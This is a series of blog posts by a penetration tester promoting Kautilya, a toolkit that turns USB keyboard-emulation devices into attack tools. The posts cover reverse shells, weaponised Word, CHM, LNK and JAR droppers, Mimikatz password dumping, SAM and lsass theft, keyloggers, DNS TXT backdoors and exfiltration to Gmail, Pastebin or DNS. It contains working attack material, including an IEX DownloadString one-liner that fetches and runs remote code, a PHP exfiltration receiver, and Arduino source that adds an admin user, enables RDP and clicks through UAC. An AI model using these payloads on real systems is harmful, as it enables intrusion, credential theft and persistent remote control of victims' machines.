Hacking with Human Interface Devices - Easy Reverse Shells

Kautilya has the ability to do interesting and useful stuff using a Human Interface Device. But sometimes, nothing beats a simple reverse shell. Recently, I added some new payloads to Kautilya which are useful for getting reverse shells using different protocols.

This post describes the payloads which give us the capability of having reverse connect PowerShell shells from Windows targets. With these payloads, Kautilya now has improved capability to provide us with a foothold machine in penetration testing engagements where use of Social Engineering techniques is allowed. Those who follow my other tool Nishang, I did a five part blog series on that.

Lets see the payloads in action.

Reverse TCP and Reverse UDP

Both of the payloads can be used with a standard netcat listener both on Windows and Linux. On Windows, Powercat can also be used. We just need to provide the IP to which the target connects back and the port to use. Upload it to a HID and send it to a target.

When a target connects the device, this is how it looks like at the listener.

Neat! An intercative reverse PowerShell shell. 

Reverse ICMP

My favorite one for bypassing network restrictions, a reverse shell completely over ICMP. This payload needs a listener, icmpsh_m.py, from the icmpsh suite. Run the command "sysctl -w net.ipv4.icmp_echo_ignore_all=1" and start the listener.  This is how it looks like on a successful connection:

This one has been useful in so many penetration tests.

Reverse HTTPS and Reverse HTTP

Reverse HTTPS is proxy aware and uses valid HTTPS traffic for reverse PowerShell shell. Its target part (typing done on the target machine) is very small and this makes it very useful. Currently, a listener on Windows is required. Run Invoorke-PoshRatHttps.ps1 in the extras directory of Kautilya from an elevated shell. The listener script adds exception to the Windows Firewall for incoming requests on the specified port.

Awesome, isn;t it?

Hope you liked the post! As always I look forward for feedback and comments.

Learn penetration testing of a highly secure live Windows network with me in PowerShell for Penetration Testers Training at:

CanSecWest, Vancouver (4 days - March 12-15th, 2016) - https://cansecwest.com/dojos/2016/powershell.html

Brucon, Gent, Belgium (3 days - April 20-22nd, 2016) - http://2016.brucon.org/index.php/Spring_Training_2016_-_PowerShell_for_Penetration_Testers

HITB, Amsterdam (2 days - May 24-25th, 2016) - http://conference.hitb.org/hitbsecconf2016ams/sessions/2-day-training-3-powershell-for-penetration-testers/

Dropping infected/weaponized files using a Human Interface Device

This post discusses dropping infected/weaponized files on a target using a Human Interface Device. I am always against using mounted SD cards in a HID. In my experience, it increases the chances of detection and blocking. Using HID without SD card limits the capability of dropping files to much extent. But it is still possible to drop files using HID, a Teensy 3.0, without having to mount additional storage.

Kautilya now has a new category of attacks - "Drop Files". Following payloads have been added.

- Drop a MS Word file

- Drop a Excel file

- Drop a CHM (Compiled HTML Help) file

- Drop a Shortcut (.LNK) file

- Drop a JAR file

Lets have a look at these payloads.

Drop a MS Word file

Use this to drop a MS Word file on a target. The Word file contains an auto executable Macro which executes when the document is opened. PowerShell commands and scripts could be executed. While a command could be simply provided as an option, to execute a script following PowerShell one-liner should be used:

IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Execution/Execute-DNSTXT-Code.ps1'));Execute-DNSTXT-Code 32.alteredsecurity.com 64.alteredsecurity.com ns8.zoneedit.com -SubDomains 5

Below screenshot shows a screen for this payload.

The generated sketch needs to be uploaded to a HID. On a target, the HID drops a PowerShell script which generates the infected MS Word file on the Desktop of current user. 

Drop a MS Excel file

This payload is similar to the MS Word payload so no need of looking at it. PowerShell scripts and commands could be passed in the same way to it.

Drop a CHM (Compiled HTML Help) file

This payload drops a weaponized CHM file on a target. Since, compiling CHM files requires HTML Help Workshop, the CHM file is generated on attacker's machine, compressed into a zip archive and byte encoded. This encoded file is written to the HID as a byte array and is then dropped on the target as a zip archive and decompressed. The byte array is quite big even after compression so the time taken by HID to type it on a target is much longer than other payloads. Kautilya shows a warning when this payload is selected.

We have to use Out-CHM in the extras directory of Kautilya to generate the CHM. The script also compresses it and creates a byte encoded text file from it. From a PowerShell prompt use this:

PS C:\Kautilya> . .extras\Out-CHM.ps1
PS C:\Kautilya> Out-CHM -PayloadURL http://192.168.254.1/exec.ps1 -HHCPath "C:\Program Files (x86)\HTML Help Workshop"

Note that we must have HTML Help Workshop installed on the attacking machine. It could be downloaded from here: http://www.microsoft.com/en-us/download/details.aspx?id=21138

Above command outputs a text file encodedchm.txt. It has to be copied to lib/src directory in Kautilya. The file is read by Kautilya and the sketch (.ino file) is generated to be written to HID.
On a victim, the HID drops the zip, uncompresses it, deletes zip and leaves the CHM on the current user's desktop.

Drop a Shortcut (.LNK) file

This payload drops a shortcut file (.lnk) on a target machine. The shortcut is set to the path powershell.exe which is. by default, same on every machine and the command/script is passed as an argument to it. We can also assign hotkey and icon to the shortcut. Interestingly, assigning a hotkey means every time the user presses that key our weaponized shortcut file would execute ;)

When the HID is connected to a target. A shortcut is created on the current user's desktop. Whenever a user clicks on the shortcut or presses the hotkey the specified command or script would be executed.

Drop a JAR file

Use this payload to drop a JAR file on a target. Like the CHM file attack, the JAR is to be created using Out-Java in the extras directory. This payload also takes much more time than other paylods in Kautilya.

From a PowerShell prompt use this:

PS C:\Kautilya> . .extras\Out-Java.ps1
PS C:\Kautilya> Out-Java -PayloadURL http://192.168.254.1/Get-Information.ps1 -JDKPath "C:\Program Files\Java\jdk1.7.0_25"

Above command outputs a text file encodedjar.txt. It has to be copied to lib/src directory in Kautilya. The file is read by Kautilya and the sketch (.ino file) is generated to be written to HID.
On a victim, the HID drops the JAR on the current user's desktop.

Below video shows the MS Word attack in action. Its my first video so please share your feedback :)

Neat!

So we can drop weaponized files on a target while using only the Keyboard emulation on a programmable HID. A useful addition to an attacker's toolchest. Kautilya could be found here: https://github.com/samratashok/Kautilya

Hope you enjoyed this!

I am doing trainings on "PowerShell for Penetration Testers" during March 2015.  A one day training at CanSecWest on 14th March (details here) and a two day training at Troopers on 16th-17th March 2015 (details here).

Kautilya 0.5.0 - Passwords in Plain, Exfiltrate SAM, Code Exec and more

Kautilya 0.5.0 is out. This version adds six more exciting payloads for Windows and supports Ruby bundler! I tried to do away with the menus and make Kautilya UI interactive shell based just like MSF but my Ruby skills failed me. I would be glad if some ruby expert could help me with that.

Anyway, lets have a look at what are the new things.

Using the artii gem, Kautilya would now show different ascii arts as banner :)

Also, you need not install each gem individually now, just run 'bundler install' from Kautilya's root directory.

Coming to the payloads, the new ones are:

Add a user and Enable Powershell Remoting
Simple and effective, this payload adds an administrative user on the target and enables Powershell Remoting from any subnet. An exception to Windows firewall is also added.

Just compile this to your HID and plug in the device.

Dump passwords in plain
This payload is able to dump passwords of users on the target system in plain-text. It uses the excellent Invoke-Mimikatz by Joseph Bialek. You need to host the Invoke-Mimikatz.ps1 on a webserver, it would be downloaded and executed in memory from there. The script could be found in the extras directory.

Lets use it from a local server. Also, lets choose gmail to exfiltrate the results.

And what we get is

  

 

Great! There is nothing better to get hold of plain-text credentials.
You could also pass any command of Mimikatz with "Invoke-Mimikatz -command  "

Copy SAM
This payload copies the SAM file with the help of Volume Shadow Service. The SAM file could be exfiltrated ONLY using gmail right now.

I understand that using gmail only means you need to leave credentials of a gmail account on a target. I tested converting the SAM file to hex and exfiltrating using other options but the size of hex file is too big to make it practical, the compression and encoding built in Kautilya, the compress_encode function in exfilmethoddefs file, didn't work either.

Execute Shellcode
Use this to execute shellcode in memory. This is based on the awesome Invoke-Shellcode from Powersploit by Matt Graeber. You need to host the Invoke-Shellcode.ps1 on a webserver, it would be downloaded and executed in memory from there. The script could be found in the extras directory.

After compiling it to a HID and connecting the HID to a target, we could see following on the listener:

Nice!
The default is set to Metasploit's windows/meterpreter/reverse_https which would work for both 32-bit and 64-bit machines.

Dump Process Memory
This payload takes a full minidump of a process. The dump file could then be exfiltrated using gmail ONLY (same reasons as for Copy SAM). The payload uses logic from Out-MiniDump.ps1 script of Powersploit. By default, the lsass process memory is dumped, but you could specify other process too.

And we recieve the dump in the specified gmail id.

Great! Now this dmp could be used to extract juicy information using any tool of choice.

Kautilya could be found here:
https://github.com/samratashok/Kautilya

The complete changelog is below:
----------------------------------------------------------------------------------------------------------------------------
CHANGELOG:
0.5.0
- Added Execute Shellcode for Windows (under Execution menu).
- Added "Dump passwords in plain" for Windows (under Gather menu).
- Added "Copy SAM (VSS)" for Windows (under Gather menu).
- Added "Dump Process Memory" for Windows (under Gather menu).
- Added "Dump Windows Vault Credentials" for Windows (under Gather menu).
- Added "Add a user and Enable Powershell Remoting" for Windows (under Manage menu).
- Added support for Gems bundler.
- Added more banners of Kautilya.
----------------------------------------------------------------------------------------------------------------------------

Hope this would be useful to you. I await feedback, comments and bugs.

Kautilya 0.4.5 - Reboot Persistence, DNS TXT exfiltration and more

This update of Kautilya introduces reboot persistence for HTTP Backdoor, DNS TXT Backdoor and Keylogger. The payloads for Windows have been rearranged in five categories making the menu clearer.

Another major improvement has been the addition of DNS TXT exfiltration and HTTP POST exfiltration to your own website. That means, your need not leave credentials of your pastebin/gmail on target.  Note that in case of gmail, you can use application specific passwords. Both of these exfiltration methods were suggested by users.

https://groups.google.com/d/msg/kautilya-users/v6IFWuGYHb8/e-NxnOD_Av8J
https://twitter.com/theart42/status/449891861352960000


So, please keep the feature requests and suggestions coming :)

Persistence
WMI permanent event consumer is included in the code for persistence, But actually, it is not being used by any payload! Why? Because, it requires administrative privileges and both the backdoors run with non-admin privileges. In the case of Keylogger too, only Run registry key is used. Besides the above reason, there is one more catch, the WMI permanenet event consumer we are using, executes the payload with SYSTEM privileges on system reboot while the Keylogger logs keys in the context of the user it runs. This makes it necesarry to run the Keylogger with the privileges of current user and not SYSTEM.

So persistence using WMI is included for future use. Do leave a comment if you think additional payloads needs persistence. It is trivial to do but needs little code changes in .ino or .pde file of that payload.

A powershell script Remove-Persistence.ps1 has been added in the extras directory which could be used to remove persistence added by various payloads in Kautilya.


Exfiltration

DNS TXT Exfiltration

In my lab, 192.168.254.228 is running a BIND DNS Server with querylogging enabled. I used these tutorials for setting it up:

http://ubuntuforums.org/showthread.php?t=236093
http://www.gypthecat.com/how-to-log-bind-queries-on-ubuntu-12-10


Lets use the DNS exfiltration with the "Get Target Credentials" payload (and I am running Kautilya on Windows)

After compiling and uploading the generated payload to a HID, lets connect it a VM, we see this:

The exfiltration method could also be used for bigger data, it simply divides the data and sends multiple queries. I will soon write a separate blog post to cover that.

Now, this data is compressed and encoded using the method found here. To decode it, use Decode.ps1 which has been added to the extras directory.

Great! We were able to exfiltrate data using only DNS TXT queries.

HTTP POST Exfiltration

A VM in my lab is running a simple code, which I got from stackoverflow.

<?php file_put_contents('/var/www/test/test.txt', file_get_contents('php://input')); ?>

Now, lets try this with the WLAN Keys Dump payload.

And we can see this on the web server:

Decoding it using Decode.ps1

Size of the payloads
Those who take interest in source code of Kautilya may notice that all the payloads have been made more modular. It means, if you chose not to do exfiltration the payload would be much smaller now, unlike earlier. Same goes for persistemce. This makes it easier to use payloads of Kautilya on various devices.


Here is the full CHANGELOG

0.4.5
- Bug fixes and improvements in Time Based Exec. It now supports exfiltration and could be stopped remotely.
- Less lines of code for HTTP Backdoor and Download Execute PS.
- HTTP Backdoor, Download Execute PS, Hashdump and Exfiltrate and Dump LSA Secrets now execute the downloaded script in memory.
- Shortened parameters passed to powershell.exe when the scripts are called. Thus, saving the time in "typing" by HID.
- Added two new exfiltration options, POST requests and DNS TXT records.
- Username and password for exfiltration would be asked only if you select gmail or pastebin.
- Tinypaste as an option for exfiltration has been removed.
- Payloads have been made more modular which results in smaller size.
- Reboot Persistence has been added to HTTP Backdoor and DNS TXT Backdoor.
- Menu redesign.
- Bug fix in Dump LSA Secrets payload.
- Added ./extras/Decode.ps1. Use this to decode data exfiltrated by HTTP Backdoor and DNS TXT Backdoor.
- Added ./extras/Remove-Persistence.ps1. Use this to remove persistence by Keylogger, HTTP Backdoor and DNS TXT Backdoor.
- Kautilya could be run on Windows if win32console gem is installed.


You can find kautilya here: http://code.google.com/p/kautilya/source/browse/trunk

As always, I welcome feedback, bugs and feature requests.

Kautilya 0.4.4 - dump lsa secrets, introduce vulns, improved backdoors and more

Here comes  Kautilya 0.4.4. This version adds three new payloads and improves couple of others.

Download and Execute Powerhell Script - As the name suggests this script downloads a powershell script and executes it on the target.

Remove Update - Remove all or security or a specific hotfix from the target. Great way to introduce vulnerability on a target.

LSA Secrets - Dump LSA Secrets from a victim. The payload detects 32-bit or 64-bit machine and calls the proper version of powershell accordingly.

I am always looking for contributors, if you want to contribute to Kautilya (or Nishang) do not hesitate to contact me.

Please refer to the CHANGELOG below for details.

0.4.4
- Added "Download and Execute Powershell Script" windows payload.
- Added "Remove Update" windows payload.
- Added "LSA Secrets" windows payload.
- Updated "DNS TXT Backdoor". It is much more easy to use now.
- Renamed Wait for Command to HTTP Backdoor
- HTTP Backdoor now keeps running till the stopstring is matched.
- An option has been added for no exfiltration of data. Choose 0 when Kautilya asks for exfil option.

Please update your repos or download the source from the repository here http://code.google.com/p/kautilya/

On a related note, Paul - the maker of Teensy pushed some updates for non-English keyboards. See the thread here (Thanks to Lorenz for reporting this): http://forum.pjrc.com/threads/23688-Possible-bug-with-windows-and-a-German-keyboard-layout. Please let me know if it helps with the problems for non-English keyboard users.

 Please feel free to report bugs and feedback.

Kautilya 0.4.3 - New exfiltration methods, faster payloads and call for contributors

While using Kautilya in penetration tests, one shortcoming of Kautilya always bug me. It is data exfiltration is with pastebin only. Specially with Keylogger module, the support only for pastebin reduces it to a PoC only thing. Not anymore, I give you Kautilya 0.4.3!

From this version onwards, Kautilya supports pastebin, gmail and tinypaste across all payloads which need to communicate with the internet. No more 10 posts limit which pastebin enforces. Gmail is the recommended choice for the keylogger payload because of the number of pastes or posts it does. If you have enabled two factor authentication for a gmail account, just generate a application specific password and use it with a payload, it works fine.

Tinypaste is also a good one as there are no limits on pasting.

Also, I have (finally) trimmed the variable names in powershell scripts which are generated by Kautilya. It means faster "typing" of payloads on a target. Enjoy!

If you want to contribute to Kautilya, contact me! You will be credited and there is guranteed fun.

Here is the CHANGELOG for Kautilya 0.4.3:

- Names of various payloads have been changed, mostly to remove pastebin from the name.
- Shortened variables names and poweshell cmdlets names in many payloads. Payloads are "typed" much faster by HID now.
- Fixed a bug on Get Target Credentials payload.
- Fixed a bug in DNS TXT Backdoor.
- Hashdump payload now uses TokenDuplication and does not schedules a task on the target, this means the payload is faster now.
- New communication options added to various payloads which exports data to pastebin/gmail/tinypaste.
- Posts to pastebin now use HTTPS.

You can get Kautilya from the google code repository.

As always, I look forward to comments, feedback and feature requests.

Kautilya 0.4.0 - reliable payload execution and more

Kautilya 0.4.0 would be more reliable than ever (at least I intended so). There has been a major change in the architecture thanks to this awesome post by the Offensive Security guys. Large parts of code have been copied from the Peensy standalone.

Two major changes in how generated payloads will execute:

1. Now, whenever you connect a device with a payload from Kautilya, it will check for responsiveness to the Caps Lock key and will continue only when the drivers are loaded properly. The default 25 seconds delay gets out of the windows *phew*.

2. When the drivers are loaded (and is confirmed by step one), the next step is to open a command prompt. To make sure that it has a command prompt, the Teensy is made to press Caps Lock programmatically and then it senses the response. Only after a response it continues to send keystrokes for the rest of the payload. Life just got easier :)


A new payload for Windows, DNS TXT Backdoor has been added. This payload is a powershell script which keeps polling TXT records of a given domain and is capable of executing commands and powershell script based on the TXT record received. Have a look at the below screenshot

The subdomain "start.example.com" is one whose TXT records would be queried continuously for instructions. The payload will keep querying this subdomain.

If it gets "begin" as the value of TXT record of "start.example.com", it will query "cmds.example.com" for commands to execute on the target machine.

If it gets "script7" in response. It will query 1.otherexample.com upto 7.otherexample.com for seven lines of powershell script, that is, in this string the last character should be equal to number of lines in your powershell script. Each line should be base64 encoded in a single TXT record :) The script is decoded on the target and executed. The payload dies afterwards. Ugly, but works ;)

Another nice thing added is credential validation by the Credentials payload. Now, whenever credentials are entered in the pop up asking for credentials, they will be validated against local accounts and default AD, if both are not validated the box appears again. Increased probability of getting credentials in plain :)

In other things,I removed two unstable (read unusable) payloads, Chrome RDP and Uninstall. The Chrome RDP payload is gone for good and Uninstall would be back in a future release after it is rewritten and made usable.


Here is the CHANGELOG

- Added Peensy functionality which means reliable execution of payloads and measured delays when the device is connected.
- Added "DNS TXT Backdoor" payload for Windows.
- Fixed a small bug in Rogue AP payload. The SSID key was not masked previously.
- Credentials payload now validates both local and AD crdentials. If creds entered could not be validated locally or at AD, credential prompt is shown again.
- Fixed a major bug in Time Based Execution payload. Embarrassingly, "echo" was missing from various lines of the payload,  making it ineffective.
- Added osx_payloadgen.txt to the extras directory. It was somehow missed in 0.3.0
- Fixed a small bug in Information Gather payload.
- Added sniffer.ps1 to the extras directory.
- Minor changes in Tracking Target Connectivity payload.
- Removed Chrome RDP Payload. Was not really useful.
- Removed Uninstall payload till next release.

As always, I welcome feedback, bug reports, questions and feature requests.

Teensy USB HID for Penetration Testers - Part 5 - Advanced Windows Payloads of Kautilya

This is the fifth post in the series of Teensy USB HID for Penetration Testers. Sorry for the gap between this and the last post (almost three months).  I was not sitting idle though, I released Nishang in between and there is a new and shiny version of Kautilya is out :)

Let us have a look at some advanced payloads in Kautilya.

Hashdump

This payload could be used to dump password hashes from Windows 7 machine. To use this payload, you have to upload powerdump meterpreter script from msf to a website (I used pastebin).  The script would then be downloaded on the victim machine later on.

On a Windows 7 machine, you must have SYSTEM privilege to dump hashes using powerdump script. This SYSTEM privilege could be gained by scheduling a task as an administrator to be run as system. The second option asked during payload generation is the name of this task.

Also, this payload pastes the hashes to pastebin as a private paste. To paste privately, you need a free account on pastebin. You need to provide username, password and api developer key (under the api link after you log in to pastebin) for your pastebin account. 

Compile the generated output to Teensy, connect to the victim and after few seconds you should see this in the private pastes of the pastebin account used with payload

 Neat!! Now we can crack or “pass” these in further attacks. (The hashes are from one of my test system).

Keylogger

This payload runs a keylogger written in powershell and pastes keys to pastebin as a private paste after a given interval. Here is how to use this:

Compile the output to Teensy, connect to the victim and you should see this in your pastebin account after few seconds (keep in mind the time interval you have given)

Download this and use parsekeys.ps1 script to get some meaningful data. The script requires data from this pastebin to be copied in a text file called data.txt in the same folder as the script and creates a file called Logged_keys.txt with the parsed keys. This is how parsed keys should look.

The keylogger is able to log keys typed in web forms and windows prompts. This payload works with a normal user privs (no admin required). While using this payload, please keep in mind that pastebin limits the number of posts per day and I think the limit is stricter for private pastes. You either need a pro account or ask me nicely for implementing some other paste service ;) In fact, I tested this on tinypaste and it worked cleanly. The reason I stuck with pastebin is that I have seen pastebin allowed in many restricted environments as compared to tinypaste.

Wireless Rogue AP

Windows 7 has a nice feature called Hosted Network. This is meant for sharing your wireless network with other devices. This feature could be used as a backdoor. This payload adds and starts a wireless hosted network on the victim. Then a meterpreter bind is executed in the memory using powershell. This technique is being used from this awesome post by Matt (used in many more payloads in Kautilya). Administrative access is required for this payload.

You need to generate bind meterpreter payload using the command in payloadgen.txt in extras directory. The generated payload is to be copied to rogue_ap.txt in src directory. After that, create a payload using Kautilya

You should be able to see a  wireless network called “wifibdoor” after the output is compiled to Teensy and attached to the victim. After successfully connecting to the network you would like to connect to the bind payload but what would be the IP address to connect to? Open up command prompt and look at the gateway for this wireless connection. As this is hosted on the victim the default gateway would be the IP of victim.

Connect to the port you used for msf bind payload on the default gateway using msf listener and bingo you have a meterpreter session. But wait, this is a bind shell what about Windows Firewall? If you look at the source,an exception is added to Windows Firewall exception list with program name as "PowerShell Update".

Connect to Hotspot and Execute Code

I got idea of this payload during an internal pen test. In case of that client, there was no internet access from the employees’ laptops barring few (almost 20) websites. In such a scenario, I use this technique which I call Injecting the Internet…hee hee.  

This payload forces the target to connect to a hot spot controlled by you thus effectively bypassing any restrictions on the internet connectivity. This forceful connection is achieved by "typing" a wlan profile on the victim, the profile is then used to make a connection. Administrative access is required for thisaction.

An ideal use case is using a hot spot hosted on a Smartphone within the wireless range of the target machine ;) In the third option (URL where the payload is hosted), you can use either a URL hosted on a web server running on your phone (I use kWS) or a URL from the internet. The Kautilya payload expects an executble in text format at this URL.

After connecting the Teensy to a victim, we get this :)

WLAN Keys Dump

This payload dumps information for all wlan profiles on the target system, including the in clear text and uploads them to pastebin as a private paste. A user with admin privs must be logged in for this payload to work.

Code Execution using DNS TXT queries

This payload pulls first stage of a meterpreter from a DNS TXT record and executes it in memory using powershell. The payload makes two queries to differnt subdomains for a 32bit and 64 bit shellcode, the architecture is detected during the payload execution and the appropriate shellcode is executed. The meterpreter needs to be generated using the command in payloadgen.txt in extras directory in Kautilya.

The result is same as some of the payloads above. A nice meterpreter shell !

Obviously, you should have control of TXT records of a domain to use this. I used a domain with zoneedit.com. It is easy and effective to use.You can fit first stage of a meterpreter inside a single TXT record.

Wait for Command

This payload continuously queries a pastebin url for specific content. As soon as the content matches, another URL is opened looking for powershell script. The powershell script is downloaded and executed on the target.

 In the above example, the content of first URL is queried continuously (with an interval of 5 seconds). Whenever you want to execute powershell script on the target, change its content to that of the magicstring (which is "balwant_rai_ke_kutte" in this case ;) ) and the payload will download and execute powershell script from the second URL .

This post covered many interesting payloads for Windows in Kautilya. In the next post in this series we will have a look at payloads for Linux (Ubuntu) and OS X. Please leave comments and feedback. I would be glad to implement (almost) any feature request.

Kautilya 0.3.0 Released - Breaking Mac OS X with USB HID and much more

Previous update of Kautilya was a couple of months back. I was travelling a lot and working on Nishang in spare time. Only a trickle of effort was given to Kautilya.  Anyway, I invested the past weekend working on Kautilya and the result is Kautilya 0.3.0. This is an important update and one of the largest since Kautilya was released. I was jumping in excitement while coding this, so much so, that I jumped some version numbers too :)

This version adds "support" for Mac OS X pwange (tested on Lion running on VMWare virtual machine) and many new payloads for Windows and Linux. Update your repositories and enjoy!!

Kautilya could be found here https://code.google.com/p/kautilya/

Below is the CHANGELOG for 0.3.0

- Added "Get Target Credentials" payload for Windows.
- Added "DNS TXT Code Execution" payload for Windows.
- Added "Tracking Target Connectivity" payload for Windows.
- Added "Speak" payload for Windows.
- Added "Wait for Command" payload for Windows.
- Added "DNS TXT Code Execution" for Linux.
- Added "Perl Reverse Shell (MSF)" for Linux.
- Added payloads for Mac OS X, tested on OS X Lion runnning on a VMWare.
- Added "Download and Execute" for  OS X.
- Added "DNS TXT Code Execution" for  OS X.
- Added "Perl Reverse Shell (MSF)" from OS X
- Added "Ruby Reverse Shell (MSF)" for OS X
- Fixed a minor bug in "code execution using powershell" payload.
- An exception is added to Windows firewall for bind shell in "Rogue AP" payload
- Fixed a major bug in "Connect to Hotspot and Execute code". The SSID key was being stored in encrypted format which doesn't work (Windows seem to encrypt WLAN keys using some machine specific key). Now the key is stored in plain and WLAN profile import works on other systems too.
- Fixed a bug in "Hashdump and upload to pastebin" payload. The powershell command was being called from the dumpaste.vbs script without bypassing executionpolicy. This means password hashes were being dumped but not pasted to pastebin..
- Removed TYPESPEED from every payload which was being used as good luck mark and was borrowed from SET :)
- Implemented Left + Enter as a method to say yes to UAC prompt, previously it was Alt + Y. Thanks to Paul who commented this on my blog.
- Increased the delay at the beginning to 25 seconds.
- Replaced the older "linux_codeexec.ino" (which had hardcoded shellcode) with proper file.
- Minor improvements in some lonux payload. Files written to disk are now written in /tmp.


 I would love feedback, bug reports and feature requests. 

Teensy USB HID for Penetration Testers - Part 4 - Kautilya

In third part of this series, we discussed how to write sketches using Arduino and Teensyduino. In this part, let's have a look at Kautilya. Kautilya is a toolkit written by me which helps in easing usage of Teensy in a penetration test. It is named after the famous Indian strategist, economist and political scientist Chankaya (Kautilya is one of his alias).  I will touch some less complex payload of Kautilya in this post.

Kautilya has a menu driven UI which could be used to generate sketches without a need of knowing how to program a Teensy device. The toolkit is written in Ruby and is free and open source. It currently contains payloads for Windows 7 and Linux (tested on Ubuntu 11). Kautilya is specifically designed to support Teensy out of the box, there is absolutely no modification required to the hardware.My motive behind writing Kautilya is to bring Teensy to masses. During my talks about Kautilya and Teensy I observed that often Pen Testers do not have enough time to program a device for their usage. Payloads in Kautilya could be used for pre exploitation and post exploitation tasks other than the “usual” popping of shells. 

The process of writing payloads for a Windows 7 machine could be summed up as:

1. Understand the operating system in terms of USB buffer.
2. Understand the commands supported and learn to write powershell or/and vbs.
3. Recognize the built-in security measures (like UAC and powershell script execution policy) which may check privileged commands and then learn how to bypass them.
4. Understand the time taken by operating system in completing various commands.
5. Write the commands and scripts on Teensy.
6. Understand more quirks of the command line when Teensy types out thing on victim.
7. Try not to be too noisy on the victim.
8. Test the payload and reach to final reasonable sketch.
9. Compile the sketch to Teensy device.
10. Attach it to the victim machine actively or using Social Engineering.
11. Enjoy the pwnage!

(Next few lines may look like self promotion ;) )

Kautilya automates steps 1-8 for you. Using Kautilya you just need to:

1. Select a payload and select your options. A sketch (a .ino or .pde file) would be generated for you.
2. Compile the sketch to Teensy device.
3. Attach it to the victim machine actively or using Social Engineering.
4. Enjoy the pwnage!

A screenshot of Kautilya 0.2.2

Kautilya is tested on Ruby 1.9.2. It requires ruby gems "colored" and "highline".

Let's have a look at some of the payloads for Windows in Kautilya. All the payloads are tested on a default install of Windows 7.

Add a user and Enable RDP
This payload adds an admin user to the victim. It also, enables and starts Terminal Service on the victim. An exception to Windows firewall is also added. This payload requires a user to be logged in with admin privileges.

The generated payload just needs to be compiled to a Teensy++. The device could then be connected to the victim. The victim will see start menu open up, some cmd being type and then a very small cmd window which type dark blue on black will do evil stuff for us...muhahaha

Let's have a look at the source code for better understanding. Many payloads in Kautilya are similar in structure to this one.

// Add an admin user and enable RDP payload of Kautilya
# define PAYLOAD_USER_ADD "net user INPUT0 INPUT1 /add"
//INPUT0 would be the username and INPUT1 would be the password.
# define PAYLOAD_GROUP_ADD "net localgroup Administrators INPUT0 /add"

void setup(){
 delay(5000);
 cmd_admin();
\\call to cmd_admin function
 delay(5000);
 send_alt_y();
\\\\call to send_alt_y function
 delay(5000);

add_user();
\\call to add_user function

Keyboard.println("reg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f");
\\Enable terminal service
delay(2000);
Keyboard.println("reg add \"HKLM\\System\\CurrentControlSet\\Services\\TermService\" /v Start /t REG_DWORD /d 2 /f");
delay(2000);
Keyboard.println("sc start termservice");
\\start terminal service
delay(2000);
Keyboard.println("netsh firewall set service type = remotedesktop mode = enable");
\\Add execption to Windows Firewall
delay(3000);
Keyboard.println("exit");
}

void loop(){
}

void run(char *SomeCommand){
  Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
  Keyboard.set_key1(KEY_R);
  Keyboard.send_now();

  delay(1500);
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();

  Keyboard.print(SomeCommand);
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();

  Keyboard.set_key1(0);
  Keyboard.send_now();
}
void add_user(){
delay(2000);
Keyboard.println(PAYLOAD_USER_ADD);
delay(2000);
Keyboard.println(PAYLOAD_GROUP_ADD);
delay(1000);

}


void send_alt_y(){
\\This function sends an Alt + Y to UAC prompt
\\thus effectively saying yes to the prompt  
  delay(1000);
  Keyboard.set_modifier(MODIFIERKEY_ALT);
  Keyboard.set_key1(KEY_Y);
  Keyboard.send_now();
  delay(100);

  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  }
void cmd_admin(){
  Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
  Keyboard.send_now();
  delay(1000);
  Keyboard.set_modifier(0);
  Keyboard.send_now();
  delay(2000);
  Keyboard.print("cmd /T:01 /K \"@echo off && mode con:COLS=15 LINES=1 && title Installing Drivers\" ");
  \\this opens up a small cmd window which writes dark blue on black and have title Installing drivers
  delay(2000);
  Keyboard.set_modifier(MODIFIERKEY_CTRL);
  Keyboard.send_now();
  Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_SHIFT);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();

  delay(200);
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

Download and Execute

This payload downloads an executable stored in text format from pastebin (or any other service which allows hosting of text without formatting), converts it back to exe on the victim and executes it in background. The exe must be converted into hex format using script exetotext.ps1 in extras folder of Kautilya. This script is originally an idea of Matt of Exploit-Monday blog.

In the above example, a windows reverse meterpreter is pasted to pastebin and the url is provided in the option.This payload could be used even with a low privilege user.

Forceful Browsing
This payload opens up a hidden instance of Internet Explorer using a COM obbject of Internet Explorer and browses to the provided URL. An ideal use case could be hosting an exploit of msf  or a hook of BeEF  on the given URL. This payload is one of my favorites as it is able to get executed on a normal user (non administrative) privilege and is very silent.

Sethc and Utilman Backdoor
This payload utilizes a useful hack in the Windows OS family. On a locked system, if you press Shift key five times (or Left Ctrl + Left Shift + Prnt Scr) i.e. sticky keys, sethc.exe is executed with SYSTEM level privileges. In a similar way, if Window key +U is pressed, utilmanager (which is utilman.exe ) is launched with SYSTEM privs. This payload attaches a an executable present on the machine as a debugger to sethc.exe and utilman.exe. The attahced executables can then be executed with SYSTEM level privileges on a locked Windows machine.

 

We had a look at some less complex payloads of Kautilya. In the next post (or posts) I will explain some more complex and powerful payloads. At least one post will cover breaking Linux (Ubuntu11) too.

I am thinking of creating some small videos demonstrating few payloads but only if some people ask for it ;) Please let me know if the length of blog posts is ok. Feedback and comments are welcome.